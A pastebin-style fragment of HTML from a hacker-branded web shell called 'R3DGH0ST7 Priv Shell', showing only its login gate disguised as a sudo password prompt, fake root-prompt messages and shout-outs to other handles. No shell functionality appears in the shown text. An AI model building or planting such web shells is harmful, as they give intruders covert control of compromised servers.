

Jul 3rd, 2017
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  236. <h1>./R3DGH0ST7 Priv Shell </h1>
  237. <div id="console"><span class="prefix">
  238. <p id="message">
  239. <font color=" ff00c1f4 ">[+] Message :</font><font color="# dc00ffff "> Welcome To my Shell</font><br>
  240. <font color=" ff00c1f4 ">[+] Message :</font><font color="# dc00ffff "> ./R3DGH0ST7 priv Shell</font><br>
  241. <font color=" ff00c1f4 ">[+] Message :</font><font color="# dc00ffff "> kutjeng is cat</font><br>
  242. <font color=" ff00c1f4 ">[+] Message :</font></font>
  243. <font color=" ff00c1f4 ">THANK'S :<font color="lime"> | S.777 | nov_404 | 4L3X15 | Mr. BeeZ | Mr.P24_404 | Mr.R,17_N0t_404| K1dz</font><br><br>
  244. <font color=" ff00c1f4 ">[sudo]./R3DGH0ST7 :~$</font><font color="# dc00ffff "> sudo su</font>
  245. <form method="post" action="" name="formnya" id="formnya"><font color=" ff00c1f4 ">[sudo]**password for</font><font color="# dc00ffff ">./R3DGH0ST7 :<input type="password" name="pass" id="pass"><input type="submit" onclick="showmz()" style="display: none"></font></form></p><p id="root">
  246. <font color=" ff00c1f4 ">root@./R3DGH0ST7 :</font><font color="# dc00ffff "> [+] Security Passed [+]</font><br>
  247. <font color=" ff00c1f4 ">root@./R3DGH0ST7 :~#</font><font color="# dc00ffff "> chmod +x</font><br>
  248. <font color=" ff00c1f4 ">root@./R3DGH0ST7 :~#</font><font color="# dc00ffff "> ./ </font><br>
  249. <font color=" ff00c1f4 ">[+] Message :</font><font color="# dc00ffff "> Please Wait...</font><br>
  250. </p>
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  265. <div class="alert alert-info" style="font-size:15px; padding:5px; text-align:center"><br/><u style="cursor:pointer;color:blue;text-decoration:blink" onclick="goPmb()"> <b><font color="black">./R3DGH0ST7 Priv Shell By ./R3DGH0ST7<br></u></div></html>
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